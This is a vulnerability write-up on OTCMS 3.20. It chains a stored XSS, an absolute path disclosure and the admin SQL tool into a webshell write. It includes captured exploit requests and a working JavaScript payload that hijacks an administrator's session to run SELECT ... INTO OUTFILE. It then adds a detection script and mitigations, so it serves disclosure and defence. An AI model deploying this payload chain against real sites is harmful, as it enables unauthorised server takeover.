OTCMS3.20 Vulnerability: A Combination of Storage-Type XSS and Absolute Path Disclosure

0x00 Background

During a source code audit of OTCMS 3.20, a chain of issues was found that lets a registered front-end user end up with a webshell on the server. The chain combines a stored XSS with an absolute path disclosure and the back end's built-in SQL execution feature.

OTCMS uses prepared statements for its database access, and the audit did not find any SQL injection. User input is handled fairly strictly: values are cast to the expected type, checked, and quotes are escaped. Even so, several individually minor weaknesses can be combined into a GetShell, although the conditions needed (an administrator has to view the injected content, and MySQL has to be allowed to write files into the web root) limit how often it is exploitable in practice.

0x01 Audit Process

The audit went through the OTCMS 3.20 source looking for places where user-controlled data reaches a sink without adequate handling. Two issues were found:

  • Stored XSS: the content filtering in classArea.php can be bypassed, so a front-end user can store HTML and JavaScript that is later rendered to other users, including administrators.
  • Absolute path disclosure: the backup routine in classZip.php echoes the absolute filesystem path of the files it compresses, revealing where the web root lives on disk.

0x02 Vulnerability Analysis

The stored XSS is in classArea.php, which processes the news content submitted from the user centre. The FilterEditor method is meant to sanitise rich-text editor input, but it can be bypassed, so a script tag submitted in the content field is stored as-is and executes whenever the item is rendered, for example when an administrator reviews the submission in the back end.

0x03 Reproduction: Stored XSS

Log in as an ordinary front-end user, open usersCenter.php?mudi=addNews, and submit a news item whose content field carries a script tag. The captured request follows (the session cookies are those of the test user on a local instance):

POST /usersNews_deal.php?mudi=deal HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Content-Type: application/x-www-form-urlencoded
Content-Length: 528
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM

backURL=http%3A%2F%2F127.0.0.1%3A8083%2FusersCenter.php%3Fmudi%3DaddNews&dataID=0&isScore1=1&isScore2=1&isScore3=0&score1Name=%E7%BB%8F%E9%AA%8C%E5%80%BC&score2Name=%E7%BD%91%E9%9B%91%E9%9B%B3%E7%88%B1&score3Name=&infoScore1=10&infoScore2=10&infoScore3=10&theme=Thinking_test&source=%E7%BD%91%E9%9B%91%E7%A7%91%E6%8A%80&writer=thinking&typeStr=,12,&content=<script>alert(1)</script>&infoFileDir=upFiles%2FinfoImg%2F&upImgStr=&pageNum=&themeKey=&contentKey=&img=&isCheckUser0&score1=&score2=&score3=&cutScore1=&cutScore2=&cutScore3=

0x04 Reproduction: Absolute Path Disclosure

The path disclosure is in the site backup feature: admin/softBak_deal.php?mudi=backup hands the selected files to classZip.php, and the progress output echoes the absolute path of each file being compressed. Starting a backup with an administrator session is enough to trigger it; this is the same request the GetShell payload in the next section sends:

POST /admin/softBak_deal.php?mudi=backup HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/x-www-form-urlencoded
Cookie: <administrator session cookies>

backURL=http://127.0.0.1:8083/admin/softBak.php?mudi=backup&mode=diy&selTable[]=upFile&zipNote=&backupSpace=server

The response contains a progress line of the form

<div>1/1 being compressed files <absolute path of the file></div>

from which the directory of the web root can be read off; in the test environment this was a path under /var/www/html. On its own this only leaks where the site lives on disk, but that is exactly what an INTO OUTFILE write needs.

0x05 Reproduction: Writing a Webshell through the Database

The back-end system file check page, admin/sysCheckFile_deal.php, has an SQL mode (mudi=sql) that executes whatever statement an administrator posts in sqlContent. Combined with the absolute path leaked by the backup routine, a SELECT ... INTO OUTFILE statement can write a PHP file straight into the web root. Neither admin endpoint is reachable by the front-end user directly, so the stored XSS is used to make the administrator's browser issue both requests: the payload below, stored as news content, first triggers a backup, extracts the path from the progress output, and then posts the INTO OUTFILE statement with the administrator's session. It only succeeds if the MySQL account has the FILE privilege and secure_file_priv does not block writes to the web root, which is the condition referred to in the background.

// Stored-XSS payload. It runs in the administrator's browser when the
// submitted news item is viewed in the back end, and uses the admin's
// session to (1) trigger a backup, whose progress output leaks the
// absolute path, and (2) run SELECT ... INTO OUTFILE through the admin
// SQL tool to write a PHP file into that directory.
function loadXMLDoc() {
    var base = "http://127.0.0.1:8083";
    var xmlhttp1 = new XMLHttpRequest();
    var xmlhttp2 = new XMLHttpRequest();

    xmlhttp1.onreadystatechange = function () {
        if (xmlhttp1.readyState === 4 && xmlhttp1.status === 200) {
            var html = xmlhttp1.responseText;
            // The literal must match the server's actual progress message;
            // the English text here is the translation of it.
            var reg = /<div>1\/1 being compressed files (.*)<\/div>/;
            var m = html.match(reg);
            if (!m) {
                return;
            }
            // Escape slashes before embedding the path in the SQL string
            // literal (MySQL reads "\/" as "/") and strip spaces.
            var dir = m[1].replace(/\//g, "\\/").replace(/ /g, "");

            // 0x3c3f70687020706870696e666f28293b3f3e is the hex form of
            // <?php phpinfo();?>
            var sql = 'SELECT 0x3c3f70687020706870696e666f28293b3f3e INTO OUTFILE "' + dir + '//evil.php"';
            xmlhttp2.open("POST", base + "/admin/sysCheckFile_deal.php?mudi=sql", true);
            xmlhttp2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            xmlhttp2.send("backURL=" + base + "/admin/sysCheckFile.php&mudi=sql&sqlContent=" +
                encodeURIComponent(sql));
        }
    };

    // Step 1: start a backup of the upFile table to obtain the absolute path.
    xmlhttp1.open("POST", base + "/admin/softBak_deal.php?mudi=backup", true);
    xmlhttp1.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp1.send("backURL=" + base + "/admin/softBak.php?mudi=backup&mode=diy&selTable[]=upFile&zipNote=&backupSpace=server");
}

loadXMLDoc();
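For anyone who has to hunt for this chain in access logs or a WAF feed, the script below is an added detection check; it is not part of the original write-up or of OTCMS. It decodes form-encoded request bodies and flags each stage of the chain described in the XSS and GetShell sections above: a news submission whose content carries active markup, an administrator POST to the backup endpoint that echoes absolute paths, and an SQL-mode POST whose statement writes a file. The endpoint names and parameters are taken from the requests on this page; the sample request bodies are constructed for the example, and the detection regexes are my own assumptions about what is worth flagging.

```python
"""Detection check for the OTCMS 3.20 stored-XSS -> path-disclosure -> INTO OUTFILE chain.

Added example (not OTCMS code). The endpoint names and parameters come from the
requests in the write-up; the sample traffic below is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Markup that should never appear in front-end news content (assumed allow-list policy).
SCRIPT_MARKUP = re.compile(r"<\s*(script|iframe|img|svg)\b|on\w+\s*=|javascript:", re.I)
# SQL that writes files on the database host.
FILE_WRITE_SQL = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)")


def decode_hex_literals(sql: str) -> list[str]:
    """Return the decoded text of every even-length 0x... literal in an SQL statement."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_LITERAL.findall(sql) if len(h) % 2 == 0]


def analyse_request(method: str, url: str, body: str) -> list[str]:
    """Return findings for one HTTP request; an empty list means nothing matched."""
    findings: list[str] = []
    if method.upper() != "POST":
        return findings
    parts = urlsplit(url)
    path = parts.path.lower()
    mudi = parse_qs(parts.query).get("mudi", [""])[0]
    form = parse_qs(body, keep_blank_values=True)

    # Stage 1: front-end news submission carrying script or event-handler markup.
    if path.endswith("usersnews_deal.php") and mudi == "deal":
        if SCRIPT_MARKUP.search(form.get("content", [""])[0]):
            findings.append("stored-xss: active markup in news content")

    # Stage 2: the backup call whose progress output echoes absolute paths.
    if path.endswith("/admin/softbak_deal.php") and mudi == "backup":
        findings.append("path-disclosure: backup request echoes absolute paths")

    # Stage 3: SQL mode of the file check page used to write a file.
    if path.endswith("/admin/syscheckfile_deal.php") and mudi == "sql":
        sql = form.get("sqlContent", [""])[0]
        if FILE_WRITE_SQL.search(sql):
            findings.append("getshell: file write via SQL, payload=%r" % decode_hex_literals(sql))
    return findings


def scan(requests):
    """Map request index -> findings for every request that triggers at least one."""
    result = {}
    for i, (method, url, body) in enumerate(requests):
        findings = analyse_request(method, url, body)
        if findings:
            result[i] = findings
    return result


# Constructed sample traffic, reduced from the requests shown in the write-up.
SAMPLE_REQUESTS = [
    ("POST", "http://127.0.0.1:8083/usersNews_deal.php?mudi=deal",
     "theme=Thinking_test&writer=thinking&content=<script>alert(1)</script>&typeStr=,12,"),
    ("POST", "http://127.0.0.1:8083/admin/softBak_deal.php?mudi=backup",
     "backURL=http://127.0.0.1:8083/admin/softBak.php?mudi=backup&mode=diy&selTable[]=upFile&zipNote=&backupSpace=server"),
    ("POST", "http://127.0.0.1:8083/admin/sysCheckFile_deal.php?mudi=sql",
     "backURL=http://127.0.0.1:8083/admin/sysCheckFile.php&mudi=sql&sqlContent="
     "SELECT%200x3c3f70687020706870696e666f28293b3f3e%20INTO%20OUTFILE%20%22/var/www/html//evil.php%22"),
    ("POST", "http://127.0.0.1:8083/usersNews_deal.php?mudi=deal",
     "theme=hello&writer=thinking&content=plain+text+only"),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        print(index, findings)
```

Stage 2 fires on every backup request, so on its own it is only context; the signal is a backup followed within seconds by an SQL-mode POST from the same administrator session, with the stored-XSS submission from a different user shortly before. The hex decoding is there because the file contents never appear in clear text in the request.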

0x06 Conclusion

None of the three pieces is serious on its own: the stored XSS needs an administrator to view the content, the path disclosure only reveals where the site lives on disk, and the SQL mode of the file check page is an intended administrator feature. Chained together they let a registered front-end user obtain a webshell: the XSS payload runs with the administrator's session, the backup output supplies the absolute path, and SELECT ... INTO OUTFILE writes the file there. Breaking any link stops the chain: encode user-submitted content on output rather than relying on an input filter, do not print absolute server paths in responses, remove or tightly restrict the arbitrary SQL execution feature, and run MySQL with secure_file_priv set and without the FILE privilege on the application account.
